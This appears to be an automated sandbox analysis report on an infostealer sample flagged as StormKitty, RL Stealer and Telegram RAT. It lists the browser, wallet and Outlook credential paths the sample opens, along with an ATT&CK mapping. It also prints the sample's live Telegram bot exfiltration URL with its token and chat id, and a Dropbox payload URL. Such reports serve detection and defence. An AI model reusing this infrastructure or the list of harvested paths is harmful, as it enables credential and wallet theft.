Source: Yara match	File source: 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Electrum
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: JaxxDir
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: ExodusDir
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: B5U2ccQ8H1.exe, 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Remote Access Functionality

Yara detected RL STEALER

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	1 OS Credential Dumping	141 Security Software Discovery	Remote Services	1 Screen Capture	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Data from Local System	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
B5U2ccQ8H1.exe	71%	ReversingLabs	ByteCode-MSIL.Infostealer.Echelon
B5U2ccQ8H1.exe	66%	Virustotal		Browse
B5U2ccQ8H1.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
edge-block-www-env.dropbox-dns.com	0%	Virustotal	Browse
api.ipify.org	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
freegeoip.app	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
dl.dropboxusercontent.com	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://api.ipify.org/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	Avira URL Cloud	safe
http://api.ipify.orgd	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/07/2024%201:05%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20928100%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.dropbox.com/login	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====	0%	Avira URL Cloud	safe
https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
https://api.ipif$	0%	Avira URL Cloud	safe
https://api.telegram.org	1%	Virustotal		Browse
https://api.ipify.org/d	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty	0%	Avira URL Cloud	safe
https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====	1%	Virustotal		Browse
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795	0%	Avira URL Cloud	safe
https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1	8%	Virustotal		Browse
https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg	0%	Avira URL Cloud	safe
https://api.ipify.org/d	0%	Virustotal		Browse
https://api.vimeworld.ru/user/name/	0%	Avira URL Cloud	safe
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty	2%	Virustotal		Browse
https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg	0%	Virustotal		Browse
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/	1%	Virustotal		Browse
https://steamcommunity.com/profiles/ASOFTWARE	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://ip-api.com/xml	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument	1%	Virustotal		Browse
https://api.vimeworld.ru/user/name/	0%	Virustotal		Browse
http://ip-api.comd	0%	Avira URL Cloud	safe
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://ip-api.com/xml	1%	Virustotal		Browse
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css	0%	Avira URL Cloud	safe
https://forums.dropbox.com	0%	Avira URL Cloud	safe
http://api.ipify.org	0%	Avira URL Cloud	safe
https://www.dropbox.com/help	0%	Avira URL Cloud	safe
https://api.telegram.orgd	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://ip-api.com/xmld	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/ASOFTWARE	0%	Virustotal		Browse
https://www.dropbox.com/help	0%	Virustotal		Browse
http://api.telegram.org	0%	Avira URL Cloud	safe
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css	0%	Virustotal		Browse
http://api.ipify.org	0%	Virustotal		Browse
https://cfl.dropboxstatic.com/static/images/favicon.ico	0%	Avira URL Cloud	safe
https://www.dropbox.com/home	0%	Avira URL Cloud	safe
https://www.dropbox.com/login	0%	Virustotal		Browse
https://dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
https://forums.dropbox.com	0%	Virustotal		Browse
http://api.telegram.org	2%	Virustotal		Browse
https://www.dropbox.com/home	0%	Virustotal		Browse
https://dl.dropboxusercontent.com	2%	Virustotal		Browse
https://cfl.dropboxstatic.com/static/images/favicon.ico	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
edge-block-www-env.dropbox-dns.com	162.125.66.15	true	false	0%, Virustotal, Browse	unknown
api.ipify.org	104.26.12.205	true	false	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	false	0%, Virustotal, Browse	unknown
freegeoip.app	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
dl.dropboxusercontent.com	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/07/2024%201:05%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20928100%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20	false	Avira URL Cloud: safe	unknown
https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://freegeoip.app/xml/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://ip-api.com/xml	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	tmpC004.tmp.dat.0.dr	false	Avira URL Cloud: safe	unknown
http://api.ipify.orgd	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr, History.txt0.0.dr	false	URL Reputation: safe	unknown
https://www.dropbox.com/login	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====	B5U2ccQ8H1.exe	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipif$	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/d	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/LimerBoy/StormKitty	B5U2ccQ8H1.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	URL Reputation: safe	unknown
http://ip-api.com	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.vimeworld.ru/user/name/	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/	B5U2ccQ8H1.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.telegram.orgd	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/ASOFTWARE	B5U2ccQ8H1.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
